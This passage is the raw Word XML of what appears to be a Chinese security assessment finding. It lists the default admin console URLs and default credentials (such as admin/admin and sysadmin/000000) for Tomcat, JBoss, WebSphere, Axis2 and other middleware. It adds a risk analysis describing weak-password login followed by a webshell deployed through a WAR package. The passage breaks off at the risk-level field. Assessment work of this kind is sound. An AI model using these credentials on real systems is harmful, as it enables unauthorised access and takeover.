        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>websphere</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的控制台常见有两种，一种是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，另一种是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，分别为如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://localhost:9060/ibm/console</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://localhost:9043/ibm/console/logon.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B04E477" w14:textId="5E74F26F"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Oracle web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：一般默认的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://localhost:5500/em,</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般存放于</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装文件夹下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下中文本文件，上面有</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BDA29E" w14:textId="47856CE8"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Mongodb web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：自带了</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：默认和数据服务一同开启。他的端口在</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mongodb</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务器端口的基础上加</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果是默认的</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mongodb</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据服务端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Which is 27017)</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>28017</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个页面可以看到当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mongodb</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有连接、各个数据库和</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的访问统计，包括：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reads, Writes, Queries, GetMores ,Inserts, Updates, Removes</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、写锁的状态、以及日志文件的最后几百行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CentOS+10gen yum </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装的</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mongodb</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的日志文件位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/var/log/mongo/mongod.log)</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571444C3" w14:textId="64AFDF4A"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HP system managent</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：该控制台一般默认的端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2381</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可在其后添加路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/cpqlogin.php?errno=100&amp;severity=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即可访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.https://localhost:2381/cpqlogin.php?errno=100&amp;severity=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9EE3FA" w14:textId="4A160003"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hint="eastAsia"/>
        </w:rPr>
        <w:t>Service Registry 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器中键入以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://hostname:port/soar/</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://localhost:6060/soar/</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果系统中安装了</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostname </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果系统中尚未安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，请使用安装了</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统的名称。</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值通常为</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6060</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，除非发生端口冲突。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9CC051" w14:textId="49707377"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Tomcat</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manager/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118ABCBE" w14:textId="36D5F6F9"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Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台默认帐号</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12778C49" w14:textId="7CA73CD7"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Jboss</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jmx-console/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D7608" w14:textId="0CCBAC8C"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Jboss</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web-console/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B5DC83" w14:textId="0A0C1699"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Jboss</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台默认无须登陆，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D94BA1" w14:textId="3CB1BF7E"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WebSphere</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ibm/console/logon.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37489C" w14:textId="502BD5B1"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WebSphere</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认帐号</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E982CE" w14:textId="6EC329EA"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Apache</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server-status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134BF5AD" w14:textId="39F107C0"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Axis2</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axis2-admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641CA358" w14:textId="2D2D3257"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lastRenderedPageBreak/>
        <w:t>Axis2</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台默认口令帐户：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin/axis2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B35B55" w14:textId="7319505F"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iSAP</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admin/login.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3A917" w14:textId="3EDB0345"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iSAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台默认的帐号和密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>admin/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3AAFB2" w14:textId="501E8B83" w:rsidR="00E32B9D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普元”管理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eosmgr/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157CA9CF" w14:textId="0346ECB2" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="00E32B9D" w:rsidP="00215B4A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普元”管理控制台默认的帐号和密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>sysadmin/000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76714258" w14:textId="0C8E7BE1" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="00C24790" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用弱口令扫描工具或者直接使用常见的弱口令去尝试登录</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件的管理控制后台，然后通过部署</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>war</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包上传</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="001F4A9E" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进而控制整个系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B1E54" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97802A" w14:textId="14C74404" w:rsidR="00757422" w:rsidRPr="00215B4A" w:rsidRDefault="0060402F" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
